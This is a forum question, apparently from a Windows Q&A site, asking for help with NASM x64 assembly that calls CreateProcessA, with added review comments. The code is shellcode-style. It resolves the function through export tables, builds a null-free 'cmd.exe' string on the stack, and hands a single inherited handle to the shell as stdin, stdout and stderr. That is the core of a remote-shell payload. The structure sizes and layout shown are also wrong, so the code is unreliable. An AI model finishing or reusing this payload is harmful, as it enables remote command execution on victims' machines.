I have problems with CreateProcessA on Win64 ASM

  64-bit, assembly, nasm, windows

I’m trying to use CreateProcessA on Win64 with nasm, but I don’t know what is wrong… I think it could be the "shadow space", but I tried adding 8 bytes for every "push" and it still fails, and I really don’t know what more I can do. Searching the internet, I can’t find anything about how to use CreateProcessA on Win64. Can somebody help me fix it, please?

;-----------------------------------------------------------------------
; Excerpt: look up a function address in a module's export tables, build
; a "cmd.exe" string and two structures on the stack, then call the
; function through r13 with ten arguments.
; Syntax: NASM (Intel). Target: Windows x64 (per the question text).
; Register roles as far as this excerpt shows:
;   rbx = module base, rdx = export-directory pointer, rcx = name index,
;         rdi = handle value  -- all set up before this excerpt; confirm
;   r13 = resolved function address (CreateProcessA per the author)
;   r15 = pointer to the "cmd.exe" string on the stack
;   r14 = pointer to the block the author labels STARTUPINFOA
;   r12 = pointer to the block the author labels ProcessInfo
; NOTE(review): run-time export lookup instead of an import, a command
; string assembled on the stack, and one handle value used for all three
; standard streams of a child with handle inheritance enabled are traits
; that memory-scan and process-creation detections commonly key on.
;-----------------------------------------------------------------------
mov esi, [rdx+0x24]     ; 32-bit RVA at +0x24; matches AddressOfNameOrdinals in IMAGE_EXPORT_DIRECTORY -- assumes rdx points there, confirm
add rsi, rbx            ; RVA -> address (assumes rbx = module base)
mov cx, [rsi+rcx*2]     ; cx = 16-bit table entry at index rcx; only the low 16 bits of rcx are replaced
mov esi, [rdx+0x1c]     ; 32-bit RVA at +0x1c; matches AddressOfFunctions
add rsi, rbx            ; RVA -> address
mov edx, [rsi+rcx*4]    ; edx = 32-bit function RVA at index rcx
add rdx, rbx            ; rdx = function address

mov r13, rdx  ; r13 = resolved address; the author names it CreateProcessA

xor rdx, rdx            ; redundant: rdx is overwritten two lines below
xor r15, r15            ; redundant: r15 is overwritten by the mov below
mov rdx, 0x616578652e646d63     ; ASCII "cmd.exea" stored little-endian; the immediate holds no zero byte
push rdx
sub word[rsp+0x7], 0x61 ; 'a' (0x61) at offset 7 becomes 0x00, terminating the string after "cmd.exe"
mov r15, rsp    ; r15 -> "cmd.exe"

; Build the block labelled STARTUPINFOA with 8-byte pushes, highest
; address first. Seventeen qwords (136 bytes) are pushed in total.
xor rdx, rdx            ; rdx = 0; stays zero until the final argument setup
push rdi  ;hStdError  (author's label; rdi comes from before this excerpt)
push rdi  ;hStdOutput (author's label)
push rdi  ;hStdInput  (author's label)
push rdx                ; two zero qwords
push rdx
xor rax, rax
inc rax
rol rax, 8              ; rax = 0x100
push rax                ; presumably meant as dwFlags = STARTF_USESTDHANDLES (0x100) -- confirm
push rdx                ; ten zero qwords follow
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
xor rax, rax
add al, 44              ; rax = 44 (decimal)
push rax                ; lowest qword of the block; presumably the cb size field -- confirm
xor r14, r14            ; redundant: r14 is overwritten by the next mov
mov r14, rsp   ; r14 -> block labelled STARTUPINFOA

xor rdi, rdi            ; rdi = 0 from here on (its old value was already pushed)
xor r12, r12            ; redundant: r12 is overwritten two lines below
sub rsp, 0x16           ; reserve 0x16 (22) bytes
mov r12, rsp   ; r12 -> block labelled ProcessInfo

sub rsp, 0x20 ; 32 bytes of shadow space (Microsoft x64 convention)

; Arguments: first four in rcx, rdx, r8, r9; the rest on the stack at
; rsp+32 upward. Parameter names below follow the documented
; CreateProcessA signature and assume r13 really holds that function.
xor r8, r8
xor r9, r9
mov [rsp+72], r12       ; arg 10: lpProcessInformation = r12
mov [rsp+64], r14       ; arg 9:  lpStartupInfo = r14
mov [rsp+56], rdx       ; arg 8:  lpCurrentDirectory = 0 (rdx is still zero here)
mov [rsp+48], rdx       ; arg 7:  lpEnvironment = 0
mov [rsp+40], rdx       ; arg 6:  dwCreationFlags = 0
xor rax, rax
inc rax
mov [rsp+32], rax       ; arg 5:  bInheritHandles = 1 (TRUE)
mov r9, rdi             ; arg 4:  lpThreadAttributes = 0 (rdi was zeroed above)
mov r8, rdi             ; arg 3:  lpProcessAttributes = 0
xor rdx, rdx            ; redundant: rdx is overwritten by the next mov
mov rdx, r15            ; arg 2:  lpCommandLine -> "cmd.exe"
xor rcx, rcx            ; arg 1:  lpApplicationName = 0 (NULL)

call r13                ; indirect call to the resolved address

Source: Windows Questions
